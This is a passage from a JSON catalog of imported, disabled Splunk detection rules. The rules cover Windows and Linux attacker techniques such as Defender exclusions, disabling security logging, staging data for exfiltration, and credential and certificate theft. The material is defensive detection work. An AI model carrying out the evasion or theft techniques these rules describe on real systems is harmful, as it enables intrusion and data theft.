If confirmed malicious, this behavior could lead to impaired security features, hindered forensic investigations, or further unauthorized access, necessitating immediate investigation to identify the responsible process and user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-account-manipulation-of-ssh-config-and-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "73a56508-1cf5-4df7-b8d9-5737fbdc27d2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_account_manipulation_of_ssh_config_and_keys.yml" } }, { "id": "splunk-security-content-73cf5dcb-cf36-4167-8bbe-384fe5384d05", "type": "detection", "name": "Windows Remote Access Software BRC4 Loaded Dll", "description": "The following analytic identifies the loading of four specific Windows DLLs (credui.dll, dbghelp.dll, samcli.dll, winhttp.dll) by a non-standard process. This detection leverages Sysmon EventCode 7 to monitor DLL load events and flags when all four DLLs are loaded within a short time frame. This activity is significant as it may indicate the presence of Brute Ratel C4, a sophisticated remote access tool used for credential dumping and other malicious activities. 
If confirmed malicious, this behavior could lead to unauthorized access, credential theft, and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-access-software-brc4-loaded-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "73cf5dcb-cf36-4167-8bbe-384fe5384d05", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_access_software_brc4_loaded_dll.yml" } }, { "id": "splunk-security-content-743a322c-9a68-4a0f-9c17-85d9cce2a27c", "type": "detection", "name": "Create or delete windows shares using net exe", "description": "The following analytic detects the creation or deletion of Windows shares using the net.exe command. It leverages Endpoint Detection and Response (EDR) data to identify processes involving net.exe with actions related to share management. This activity is significant because it may indicate an attacker attempting to manipulate network shares for malicious purposes, such as data exfiltration, malware distribution, or establishing persistence. If confirmed malicious, this activity could lead to unauthorized access to sensitive information, service disruption, or malware introduction. 
Immediate investigation is required to determine the intent and mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/create-or-delete-windows-shares-using-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "743a322c-9a68-4a0f-9c17-85d9cce2a27c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/create_or_delete_windows_shares_using_net_exe.yml" } }, { "id": "splunk-security-content-747d7800-2eaa-422d-b994-04d8bb9e06d0", "type": "detection", "name": "Windows Steal Authentication Certificates Certificate Request", "description": "The following analytic detects when a new certificate is requested from Certificate Services - AD CS. It leverages Event ID 4886, which indicates that a certificate request has been received. This activity is significant because unauthorized certificate requests can be part of credential theft or lateral movement tactics. If confirmed malicious, an attacker could use the certificate to impersonate users, gain unauthorized access to resources, or establish persistent access within the environment. 
Monitoring and correlating this event with other suspicious activities is crucial for identifying potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-certificate-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "747d7800-2eaa-422d-b994-04d8bb9e06d0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_certificate_request.yml" } }, { "id": "splunk-security-content-74a8133f-93e7-4b71-9bd3-13a66124fd57", "type": "detection", "name": "Windows System LogOff Commandline", "description": "The following analytic detects the execution of the Windows command line to log off a host machine. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes involving `shutdown.exe` with specific parameters. This activity is significant as it is often associated with Advanced Persistent Threats (APTs) and Remote Access Trojans (RATs) like dcrat, which use this technique to disrupt operations, aid in system destruction, or inhibit recovery. 
If confirmed malicious, this could lead to system downtime, data loss, or hindered incident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-logoff-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "74a8133f-93e7-4b71-9bd3-13a66124fd57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_logoff_commandline.yml" } }, { "id": "splunk-security-content-74c5a3b0-27a7-463c-9d00-1a5bb12cb7b5", "type": "detection", "name": "Windows Archive Collected Data via Powershell", "description": "The following analytic detects the use of PowerShell scripts to archive files into a temporary folder. It leverages PowerShell Script Block Logging, specifically monitoring for the `Compress-Archive` command targeting the `Temp` directory. This activity is significant as it may indicate an adversary's attempt to collect and compress data for exfiltration. 
If confirmed malicious, this behavior could lead to unauthorized data access and exfiltration, posing a severe risk to sensitive information and overall network security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-archive-collected-data-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "74c5a3b0-27a7-463c-9d00-1a5bb12cb7b5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_archive_collected_data_via_powershell.yml" } }, { "id": "splunk-security-content-7567a72f-bada-489d-aef1-59743fb64a66", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Signature Retirement", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender Signature Retirement. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the DisableSignatureRetirement registry setting. This activity is significant because disabling signature retirement can prevent Windows Defender from removing outdated antivirus signatures, potentially reducing its effectiveness in detecting threats. 
If confirmed malicious, this action could allow an attacker to evade detection by using older, less relevant signatures, thereby compromising the system's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-signature-retirement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7567a72f-bada-489d-aef1-59743fb64a66", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_signature_retirement.yml" } }, { "id": "splunk-security-content-75b00fd8-a0ff-11eb-8b31-acde48001122", "type": "detection", "name": "Schedule Task with Rundll32 Command Trigger", "description": "The following analytic detects the creation of scheduled tasks in Windows that use the rundll32 command. It leverages Windows Security EventCode 4698, which logs the creation of scheduled tasks, and filters for tasks executed via rundll32. This activity is significant as it is a common technique used by malware, such as TrickBot, to persist in an environment or deliver additional payloads. If confirmed malicious, this could lead to data theft, ransomware deployment, or other damaging outcomes. 
Immediate investigation and mitigation are crucial to prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/schedule-task-with-rundll32-command-trigger.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "75b00fd8-a0ff-11eb-8b31-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/schedule_task_with_rundll32_command_trigger.yml" } }, { "id": "splunk-security-content-75dfd9f4-ca64-45d0-9422-4bde6d26a59e", "type": "detection", "name": "CrushFTP Max Simultaneous Users From IP", "description": "The following analytic identifies instances where CrushFTP has blocked access due to exceeding the maximum number of simultaneous connections from a single IP address. This activity may indicate brute force attempts, credential stuffing, or automated attacks against the CrushFTP server. 
This detection is particularly relevant following the discovery of CVE-2025-31161, an authentication bypass vulnerability in CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crushftp-max-simultaneous-users-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "75dfd9f4-ca64-45d0-9422-4bde6d26a59e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/crushftp_max_simultaneous_users_from_ip.yml" } }, { "id": "splunk-security-content-76406a0f-f5e0-4167-8e1f-337fdc0f1b0c", "type": "detection", "name": "Windows Impair Defenses Disable Win Defender Auto Logging", "description": "The following analytic detects the disabling of Windows Defender logging by identifying changes to the Registry keys DefenderApiLogger or DefenderAuditLogger set to disable. It leverages data from the Endpoint.Registry datamodel to monitor specific registry paths and values. This activity is significant as it is commonly associated with Remote Access Trojan (RAT) malware attempting to evade detection. 
If confirmed malicious, this action could allow an attacker to conceal their activities, making it harder to detect further malicious actions and maintain persistence on the compromised endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defenses-disable-win-defender-auto-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76406a0f-f5e0-4167-8e1f-337fdc0f1b0c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defenses_disable_win_defender_auto_logging.yml" } }, { "id": "splunk-security-content-76753bab-f116-4ea3-8fb9-89b638be58a9", "type": "detection", "name": "Windows Ingress Tool Transfer Using Explorer", "description": "The following analytic identifies instances where the Windows Explorer process (explorer.exe) is executed with a URL in its command line. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because adversaries, such as those using DCRat malware, may abuse explorer.exe to open URLs with the default browser, which is an uncommon and suspicious behavior. 
If confirmed malicious, this technique could allow attackers to download and execute malicious payloads, leading to potential system compromise and further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ingress-tool-transfer-using-explorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76753bab-f116-4ea3-8fb9-89b638be58a9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ingress_tool_transfer_using_explorer.yml" } }, { "id": "splunk-security-content-7698b945-238e-4bb9-b172-81f5ca1685a1", "type": "detection", "name": "O365 Email Reported By User Found Malicious", "description": "The following analytic detects when an email submitted to Microsoft using the built-in report button in Outlook is found to be malicious. This capability is an enhanced protection feature that can be used within o365 tenants by users to report potentially malicious emails. 
This correlation looks for any submission that returns a Phish or Malware verdict upon submission.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-reported-by-user-found-malicious.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7698b945-238e-4bb9-b172-81f5ca1685a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_reported_by_user_found_malicious.yml" } }, { "id": "splunk-security-content-76ac2dcb-333c-4a77-8ae9-2720cfae47a8", "type": "detection", "name": "Citrix ADC Exploitation CVE-2023-3519", "description": "The following analytic identifies potential exploitation attempts against Citrix ADC related to CVE-2023-3519. 
It detects POST requests to specific web endpoints associated with this vulnerability by leveraging the Web datamodel.\nThis activity is significant as CVE-2023-3519 involves a SAML processing overflow issue that can lead to memory corruption, posing a high risk.\nIf confirmed malicious, attackers could exploit this to execute arbitrary code, escalate privileges, or disrupt services, making it crucial for SOC analysts to monitor and investigate these alerts promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/citrix-adc-exploitation-cve-2023-3519.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76ac2dcb-333c-4a77-8ae9-2720cfae47a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/citrix_adc_exploitation_cve_2023_3519.yml" } }, { "id": "splunk-security-content-76d6573f-c4ab-4fa1-8390-c036416d4add", "type": "detection", "name": "Linux Auditd Auditd Daemon Abort", "description": "The following analytic detects the abnormal termination of the Linux audit daemon (auditd) by identifying DAEMON_ABORT events in audit logs. These terminations suggest a serious failure of the auditing subsystem, potentially due to resource exhaustion, corruption, or malicious interference. Unlike a clean shutdown, DAEMON_ABORT implies that audit logging may have been disabled without system administrator intent. 
Alerts should be generated on detection and correlated with DAEMON_START, DAEMON_END, and system logs to determine root cause. If no DAEMON_START follows soon after, or this pattern repeats, it indicates a high-severity issue that impacts log integrity and should be immediately investigated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-daemon-abort.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76d6573f-c4ab-4fa1-8390-c036416d4add", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_daemon_abort.yml" } }, { "id": "splunk-security-content-76ea28ac-6f10-43fd-b5fe-340022ad0fd3", "type": "detection", "name": "Windows WSUS Spawning Shell", "description": "The following analytic identifies instances where a shell (PowerShell.exe or Cmd.exe) is spawned from wsusservice.exe, the Windows Server Update Services process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the parent process is wsusservice.exe. This activity is significant as it may indicate exploitation of CVE-2025-59287, a critical deserialization vulnerability in WSUS that allows unauthenticated remote code execution. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary commands on WSUS servers, potentially leading to system compromise, data exfiltration, domain enumeration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wsus-spawning-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "76ea28ac-6f10-43fd-b5fe-340022ad0fd3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wsus_spawning_shell.yml" } }, { "id": "splunk-security-content-773b66fe-4dd9-11ec-8289-acde48001122", "type": "detection", "name": "Add or Set Windows Defender Exclusion", "description": "The following analytic detects the use of commands to add or set exclusions\nin Windows Defender. It leverages data from Endpoint Detection and Response (EDR)\nagents, focusing on command-line executions involving \"Add-MpPreference\" or \"Set-MpPreference\"\nwith exclusion parameters. 
This activity is significant because adversaries often\nuse it to bypass Windows Defender, allowing malicious code to execute undetected.\nIf confirmed malicious, this behavior could enable attackers to evade antivirus\ndetection, maintain persistence, and execute further malicious activities without\ninterference from Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/add-or-set-windows-defender-exclusion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "773b66fe-4dd9-11ec-8289-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/add_or_set_windows_defender_exclusion.yml" } }, { "id": "splunk-security-content-7742987e-88c1-476b-a626-a869e088ab72", "type": "detection", "name": "Windows User Discovery Via Net", "description": "The following analytic detects the execution of `net.exe` or `net1.exe` with command-line arguments `user` or `users` to query local user accounts. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate local users, which is a common step in situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could lead to further attacks, including privilege escalation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-discovery-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7742987e-88c1-476b-a626-a869e088ab72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_discovery_via_net.yml" } }, { "id": "splunk-security-content-7742aa92-c9d9-11eb-bbfc-acde48001122", "type": "detection", "name": "Prevent Automatic Repair Mode using Bcdedit", "description": "The following analytic detects the execution of \"bcdedit.exe\" with parameters to set the boot status policy to ignore all failures. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because it can indicate an attempt by ransomware to prevent a compromised machine from booting into automatic repair mode, thereby hindering recovery efforts. 
If confirmed malicious, this action could allow attackers to maintain control over the infected system, complicating remediation and potentially leading to further damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/prevent-automatic-repair-mode-using-bcdedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7742aa92-c9d9-11eb-bbfc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/prevent_automatic_repair_mode_using_bcdedit.yml" } }, { "id": "splunk-security-content-77592bec-d5cc-11eb-9e60-acde48001122", "type": "detection", "name": "Excessive number of service control start as disabled", "description": "The following analytic detects an excessive number of `sc.exe` processes launched with the command line argument `start= disabled` within a short period. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and process GUIDs. This activity is significant as it may indicate an attempt to disable critical services, potentially impairing system defenses. 
If confirmed malicious, this behavior could allow an attacker to disrupt security mechanisms, hinder incident response, and maintain control over the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-number-of-service-control-start-as-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "77592bec-d5cc-11eb-9e60-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml" } }, { "id": "splunk-security-content-77f41d9e-b8be-47e3-ab35-5776f5ec1d20", "type": "detection", "name": "User Discovery With Env Vars PowerShell Script Block", "description": "The following analytic detects the use of PowerShell environment variables to identify the current logged user by leveraging PowerShell Script Block Logging (EventCode=4104). This method monitors script blocks containing `$env:UserName` or `[System.Environment]::UserName`. Identifying this activity is significant as adversaries and Red Teams may use it for situational awareness and Active Directory discovery on compromised endpoints. 
If confirmed malicious, this activity could allow attackers to gain insights into user context, aiding in further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/user-discovery-with-env-vars-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "77f41d9e-b8be-47e3-ab35-5776f5ec1d20", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/user_discovery_with_env_vars_powershell_script_block.yml" } }, { "id": "splunk-security-content-783f0798-f679-4c17-b3b3-187febf0b9b8", "type": "detection", "name": "Windows Impair Defense Change Win Defender Quick Scan Interval", "description": "The following analytic detects modifications to the Windows registry that change the Windows Defender Quick Scan Interval. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"QuickScanInterval\" registry path. This activity is significant because altering the scan interval can impair Windows Defender's ability to detect malware promptly, potentially allowing threats to persist undetected. 
If confirmed malicious, this modification could enable attackers to bypass security measures, maintain persistence, and execute further malicious activities without being detected by quick scans.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-quick-scan-interval.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "783f0798-f679-4c17-b3b3-187febf0b9b8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_quick_scan_interval.yml" } }, { "id": "splunk-security-content-784241aa-85a5-4782-a503-d071bd3446f9", "type": "detection", "name": "Linux Auditd Find Credentials From Password Managers", "description": "The following analytic detects suspicious attempts to find credentials stored in password managers, which may indicate an attacker's effort to retrieve sensitive login information. Password managers are often targeted by adversaries seeking to access stored passwords for further compromise or lateral movement within a network. 
By monitoring for unusual or unauthorized access to password manager files or processes, this analytic helps identify potential credential theft attempts, enabling security teams to respond quickly to protect critical accounts and prevent further unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-find-credentials-from-password-managers.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "784241aa-85a5-4782-a503-d071bd3446f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_find_credentials_from_password_managers.yml" } }, { "id": "splunk-security-content-785bbfb5-d404-42d1-ab9d-45c37a2c75cd", "type": "detection", "name": "Windows MMC Loaded Script Engine DLL", "description": "The following analytic identifies when a Windows process loads scripting libraries like jscript.dll or vbscript.dll to execute script code on a target system. While these DLLs are legitimate parts of the operating system, their use by unexpected processes or in unusual contexts can indicate malicious activity, such as script-based malware, living-off-the-land techniques, or automated attacks. This detection monitors which processes load these libraries, along with their command-line arguments and parent processes, to help distinguish normal administrative behavior from potential threats. 
Alerts should be investigated with attention to the process context and any subsequent network or system activity, as legitimate tools like MMC snap-ins may also trigger this behavior under routine administrative tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mmc-loaded-script-engine-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "785bbfb5-d404-42d1-ab9d-45c37a2c75cd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mmc_loaded_script_engine_dll.yml" } }, { "id": "splunk-security-content-787dd1c1-eb3a-4a31-8e8c-2ad24b214bc8", "type": "detection", "name": "GitHub Enterprise Disable Dependabot", "description": "The following analytic detects when a user disables Dependabot security features within a GitHub repository. Dependabot helps automatically identify and fix security vulnerabilities in dependencies. The detection monitors GitHub Enterprise logs for configuration changes that disable Dependabot functionality. This behavior could indicate an attacker attempting to prevent the automatic detection of vulnerable dependencies, which would allow them to exploit known vulnerabilities that would otherwise be patched. For a SOC, identifying the disabling of security features like Dependabot is critical as it may be a precursor to supply chain attacks where attackers exploit vulnerable dependencies. 
